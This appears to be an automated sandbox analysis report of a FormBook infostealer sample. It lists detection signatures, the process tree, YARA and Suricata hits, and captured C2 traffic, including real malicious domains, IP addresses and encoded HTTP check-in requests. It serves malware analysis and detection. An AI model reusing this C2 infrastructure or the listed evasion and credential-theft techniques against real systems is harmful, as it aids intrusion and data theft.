Edit tour

Windows Analysis Report
AuKUol8SPU.exe

Overview

General Information

Sample name:	AuKUol8SPU.exe renamed because original name is a hash value
Original sample name:	39ce493be8b616b0a5e0a7d96e1790789217833cac76f8d31cf73e6347d80916.exe
Analysis ID:	1588002
MD5:	7c5bc4b08a2079878caba5453e2716a9
SHA1:	be81a1498353a6717ad7ceba7642cfa4190cb33f
SHA256:	39ce493be8b616b0a5e0a7d96e1790789217833cac76f8d31cf73e6347d80916
Tags:	exeFormbookuser-adrian__luca
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Found direct / indirect Syscall (likely to bypass EDR)

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected non-DNS traffic on DNS port

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

AuKUol8SPU.exe (PID: 2716 cmdline: "C:\Users\user\Desktop\AuKUol8SPU.exe" MD5: 7C5BC4B08A2079878CABA5453E2716A9)

svchost.exe (PID: 3964 cmdline: "C:\Users\user\Desktop\AuKUol8SPU.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

kObgmFzfBE.exe (PID: 7164 cmdline: "C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

wiaacmgr.exe (PID: 5680 cmdline: "C:\Windows\SysWOW64\wiaacmgr.exe" MD5: 2F1D379CE47E920BDDD2C50214457E0F)

kObgmFzfBE.exe (PID: 6180 cmdline: "C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 1524 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000005.00000002.2596615908.0000000004ED0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.2596676816.0000000004F20000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1592353153.0000000006790000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.2594866519.0000000003260000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1596603872.00000000084A0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000008.00000002.2598461928.00000000050F0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.2596411937.00000000057A0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1591098519.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\AuKUol8SPU.exe", CommandLine: "C:\Users\user\Desktop\AuKUol8SPU.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\AuKUol8SPU.exe", ParentImage: C:\Users\user\Desktop\AuKUol8SPU.exe, ParentProcessId: 2716, ParentProcessName: AuKUol8SPU.exe, ProcessCommandLine: "C:\Users\user\Desktop\AuKUol8SPU.exe", ProcessId: 3964, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\AuKUol8SPU.exe", CommandLine: "C:\Users\user\Desktop\AuKUol8SPU.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\AuKUol8SPU.exe", ParentImage: C:\Users\user\Desktop\AuKUol8SPU.exe, ParentProcessId: 2716, ParentProcessName: AuKUol8SPU.exe, ProcessCommandLine: "C:\Users\user\Desktop\AuKUol8SPU.exe", ProcessId: 3964, ProcessName: svchost.exe

Suricata Signatures

ETPRO MALWARE FormBook CnC Checkin (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T20:25:41.028340+0100	2855464	1	A Network Trojan was detected	192.168.2.9	55717	185.199.108.153	80	TCP
2025-01-10T20:25:43.587770+0100	2855464	1	A Network Trojan was detected	192.168.2.9	55718	185.199.108.153	80	TCP
2025-01-10T20:25:46.171043+0100	2855464	1	A Network Trojan was detected	192.168.2.9	55719	185.199.108.153	80	TCP
2025-01-10T20:25:54.769932+0100	2855464	1	A Network Trojan was detected	192.168.2.9	55721	104.21.48.233	80	TCP
2025-01-10T20:25:57.362094+0100	2855464	1	A Network Trojan was detected	192.168.2.9	55722	104.21.48.233	80	TCP
2025-01-10T20:25:59.947079+0100	2855464	1	A Network Trojan was detected	192.168.2.9	55723	104.21.48.233	80	TCP
2025-01-10T20:26:08.025897+0100	2855464	1	A Network Trojan was detected	192.168.2.9	55725	199.59.243.228	80	TCP
2025-01-10T20:26:10.552403+0100	2855464	1	A Network Trojan was detected	192.168.2.9	55726	199.59.243.228	80	TCP
2025-01-10T20:26:13.091157+0100	2855464	1	A Network Trojan was detected	192.168.2.9	55727	199.59.243.228	80	TCP
2025-01-10T20:26:21.954980+0100	2855464	1	A Network Trojan was detected	192.168.2.9	55729	8.136.96.106	80	TCP
2025-01-10T20:26:24.470607+0100	2855464	1	A Network Trojan was detected	192.168.2.9	55730	8.136.96.106	80	TCP
2025-01-10T20:26:27.027328+0100	2855464	1	A Network Trojan was detected	192.168.2.9	55731	8.136.96.106	80	TCP
2025-01-10T20:26:35.237321+0100	2855464	1	A Network Trojan was detected	192.168.2.9	55733	69.57.163.64	80	TCP
2025-01-10T20:26:37.821174+0100	2855464	1	A Network Trojan was detected	192.168.2.9	55734	69.57.163.64	80	TCP
2025-01-10T20:26:40.397465+0100	2855464	1	A Network Trojan was detected	192.168.2.9	55735	69.57.163.64	80	TCP
2025-01-10T20:26:49.425188+0100	2855464	1	A Network Trojan was detected	192.168.2.9	55737	170.33.13.246	80	TCP
2025-01-10T20:26:51.757073+0100	2855464	1	A Network Trojan was detected	192.168.2.9	55738	170.33.13.246	80	TCP
2025-01-10T20:26:54.785439+0100	2855464	1	A Network Trojan was detected	192.168.2.9	55739	170.33.13.246	80	TCP
2025-01-10T20:27:03.181066+0100	2855464	1	A Network Trojan was detected	192.168.2.9	55741	66.235.200.145	80	TCP
2025-01-10T20:27:05.784485+0100	2855464	1	A Network Trojan was detected	192.168.2.9	55742	66.235.200.145	80	TCP
2025-01-10T20:27:08.287324+0100	2855464	1	A Network Trojan was detected	192.168.2.9	55743	66.235.200.145	80	TCP

ETPRO MALWARE FormBook CnC Checkin (POST) M4

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T20:25:54.769932+0100	2856318	1	A Network Trojan was detected	192.168.2.9	55721	104.21.48.233	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: AuKUol8SPU.exe	Virustotal: Detection: 66%			Perma Link
Source: AuKUol8SPU.exe	ReversingLabs: Detection: 71%

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.2596615908.0000000004ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2596676816.0000000004F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1592353153.0000000006790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2594866519.0000000003260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1596603872.00000000084A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2598461928.00000000050F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2596411937.00000000057A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1591098519.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: AuKUol8SPU.exe

Joe Sandbox ML: detected

Source: AuKUol8SPU.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: kObgmFzfBE.exe, 00000003.00000000.1512442762.00000000009AE000.00000002.00000001.01000000.00000004.sdmp, kObgmFzfBE.exe, 00000008.00000000.1657959129.00000000009AE000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: wntdll.pdbUGP source: AuKUol8SPU.exe, 00000000.00000003.1366370637.00000000041B0000.00000004.00001000.00020000.00000000.sdmp, AuKUol8SPU.exe, 00000000.00000003.1366079115.0000000004300000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1493313421.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1591691485.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1591691485.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1491765318.0000000003800000.00000004.00000020.00020000.00000000.sdmp, wiaacmgr.exe, 00000005.00000002.2597192227.0000000005300000.00000040.00001000.00020000.00000000.sdmp, wiaacmgr.exe, 00000005.00000003.1591272724.0000000004FAF000.00000004.00000020.00020000.00000000.sdmp, wiaacmgr.exe, 00000005.00000002.2597192227.000000000549E000.00000040.00001000.00020000.00000000.sdmp, wiaacmgr.exe, 00000005.00000003.1594031438.0000000005155000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: AuKUol8SPU.exe, 00000000.00000003.1366370637.00000000041B0000.00000004.00001000.00020000.00000000.sdmp, AuKUol8SPU.exe, 00000000.00000003.1366079115.0000000004300000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1493313421.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1591691485.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1591691485.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1491765318.0000000003800000.00000004.00000020.00020000.00000000.sdmp, wiaacmgr.exe, wiaacmgr.exe, 00000005.00000002.2597192227.0000000005300000.00000040.00001000.00020000.00000000.sdmp, wiaacmgr.exe, 00000005.00000003.1591272724.0000000004FAF000.00000004.00000020.00020000.00000000.sdmp, wiaacmgr.exe, 00000005.00000002.2597192227.000000000549E000.00000040.00001000.00020000.00000000.sdmp, wiaacmgr.exe, 00000005.00000003.1594031438.0000000005155000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wiaacmgr.pdbGCTL source: svchost.exe, 00000002.00000003.1558518165.000000000361B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1558656536.000000000362E000.00000004.00000020.00020000.00000000.sdmp, kObgmFzfBE.exe, 00000003.00000002.2595623283.0000000001338000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wiaacmgr.pdb source: svchost.exe, 00000002.00000003.1558518165.000000000361B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1558656536.000000000362E000.00000004.00000020.00020000.00000000.sdmp, kObgmFzfBE.exe, 00000003.00000002.2595623283.0000000001338000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: wiaacmgr.exe, 00000005.00000002.2595170542.00000000034AE000.00000004.00000020.00020000.00000000.sdmp, wiaacmgr.exe, 00000005.00000002.2597992420.000000000592C000.00000004.10000000.00040000.00000000.sdmp, kObgmFzfBE.exe, 00000008.00000000.1658574573.0000000002CBC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.1876564495.00000000141DC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: wiaacmgr.exe, 00000005.00000002.2595170542.00000000034AE000.00000004.00000020.00020000.00000000.sdmp, wiaacmgr.exe, 00000005.00000002.2597992420.000000000592C000.00000004.10000000.00040000.00000000.sdmp, kObgmFzfBE.exe, 00000008.00000000.1658574573.0000000002CBC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.1876564495.00000000141DC000.00000004.80000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Code function: 0_2_00B7445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00B7445A
Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Code function: 0_2_00B7C6D1 FindFirstFileW,FindClose,	0_2_00B7C6D1
Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Code function: 0_2_00B7C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00B7C75C
Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Code function: 0_2_00B7EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00B7EF95
Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Code function: 0_2_00B7F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00B7F0F2
Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Code function: 0_2_00B7F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00B7F3F3
Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Code function: 0_2_00B737EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00B737EF
Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Code function: 0_2_00B73B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00B73B12
Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Code function: 0_2_00B7BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00B7BCBC
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_0327C9D0 FindFirstFileW,FindNextFileW,FindClose,	5_2_0327C9D0

Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 4x nop then xor eax, eax	5_2_03269E50
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 4x nop then pop edi	5_2_0326E59E
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 4x nop then mov ebx, 00000004h	5_2_051504E8

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:55727 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:55722 -> 104.21.48.233:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:55731 -> 8.136.96.106:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:55723 -> 104.21.48.233:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:55717 -> 185.199.108.153:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:55725 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:55742 -> 66.235.200.145:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:55734 -> 69.57.163.64:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:55729 -> 8.136.96.106:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:55721 -> 104.21.48.233:80
Source: Network traffic	Suricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.9:55721 -> 104.21.48.233:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:55737 -> 170.33.13.246:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:55726 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:55738 -> 170.33.13.246:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:55718 -> 185.199.108.153:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:55743 -> 66.235.200.145:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:55741 -> 66.235.200.145:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:55730 -> 8.136.96.106:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:55719 -> 185.199.108.153:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:55733 -> 69.57.163.64:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:55739 -> 170.33.13.246:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:55735 -> 69.57.163.64:80

Performs DNS queries to domains with low reputation

Source:	DNS query: www.juewucangku.xyz
Source:	DNS query: www.startsomething.xyz

Source: global traffic

TCP traffic: 192.168.2.9:55714 -> 162.159.36.2:53

Source: Joe Sandbox View

IP Address: 170.33.13.246 170.33.13.246

Source: Joe Sandbox View	ASN Name: CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd
Source: Joe Sandbox View	ASN Name: FORTRESSITXUS FORTRESSITXUS

Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\AuKUol8SPU.exe

Code function: 0_2_00B822EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_00B822EE

Source: global traffic	HTTP traffic detected: GET /3e00/?rVu4SxF=vcWi2Nuzfs8bFUYEQnXoBGbuOVlE2i7vXXwcNv5UqJ4W+nqlyarjJ+7bYKIWgHEnmSKdgKCrspLX0t5o9qCK31lP9N0MfL58cB+/rM1htgjxM9asHw==&JXYh=X6eL8Vp0 HTTP/1.1Host: www.goldbracelet.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
Source: global traffic	HTTP traffic detected: GET /k3hn/?rVu4SxF=dZddn2QnmIt3Z4tuH0E3g34XkYAItSNhr8Xg5sy2kai1E7eSB/izKfIU3bxH1QSpc7GJ9Hdmeil28QjfyJs8j2YhgReETzRCnNPRybqTpZLdK0zipA==&JXYh=X6eL8Vp0 HTTP/1.1Host: www.pku-cs-cjw.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
Source: global traffic	HTTP traffic detected: GET /al74/?JXYh=X6eL8Vp0&rVu4SxF=1Bjse4aauCmo97N7IjLs1t9/5DytV/tAUwTJU6u6E+Bhsof6UHxdy2RqbyRgtbt7gLKPghU8oqnr4otrEVDupCQsZrXlGifKOpb9tUiueuaR7GHXUw== HTTP/1.1Host: www.ausyva4.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
Source: global traffic	HTTP traffic detected: GET /cfcv/?rVu4SxF=yFDcd28s49uqEHKp5gxZDHehDMkbx8O5HFlFfS4Td0kedo/+sd9J73ZTBpR3wC1xC+DY+jWyDKbAELqR1mf/HVtkfFoENqJsrfHfmbA9hKHiQ73oaQ==&JXYh=X6eL8Vp0 HTTP/1.1Host: www.969-usedcar02.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
Source: global traffic	HTTP traffic detected: GET /b6bc/?JXYh=X6eL8Vp0&rVu4SxF=xoBYbUYuit1npWAwAtyehE3iQkiUZWMjRZPyJ7i/hpkEutNt4jOTaw6JRAgW2lC4HeAxlwjpiSK9Zc7LnKUAi+2qRV04Y8KYMj5mgKl2iJfvRHsG+g== HTTP/1.1Host: www.juewucangku.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
Source: global traffic	HTTP traffic detected: GET /9er8/?rVu4SxF=y0ZQaQGYytoPYKDdgLZSit2uqdIxJa9e7dCpW1aT2gUHtttnVaZ37Rd6tJxE+MMiCUIjuSyOnxmaU3U+fVZaMHx03gUwA2Avn+NiKPlzkrwvOlggCg==&JXYh=X6eL8Vp0 HTTP/1.1Host: www.startsomething.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
Source: global traffic	HTTP traffic detected: GET /3oq9/?rVu4SxF=2MJNacGdKZTNHNzV3BrHuFLNQ1jOTMwdeLZZPQlvVcFfWk0fi2yrHAqCm0wTlbN3Ra2bNNLNNGmcvIo8esHmiv8xn0odowBTH4/kOUn28Kur/JALIg==&JXYh=X6eL8Vp0 HTTP/1.1Host: www.opro.vipAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)

Source: global traffic	DNS traffic detected: DNS query: www.goldbracelet.top
Source: global traffic	DNS traffic detected: DNS query: www.pku-cs-cjw.top
Source: global traffic	DNS traffic detected: DNS query: www.ausyva4.top
Source: global traffic	DNS traffic detected: DNS query: www.969-usedcar02.shop
Source: global traffic	DNS traffic detected: DNS query: www.juewucangku.xyz
Source: global traffic	DNS traffic detected: DNS query: www.startsomething.xyz
Source: global traffic	DNS traffic detected: DNS query: www.opro.vip
Source: global traffic	DNS traffic detected: DNS query: www.santillo.bet

Source: unknown

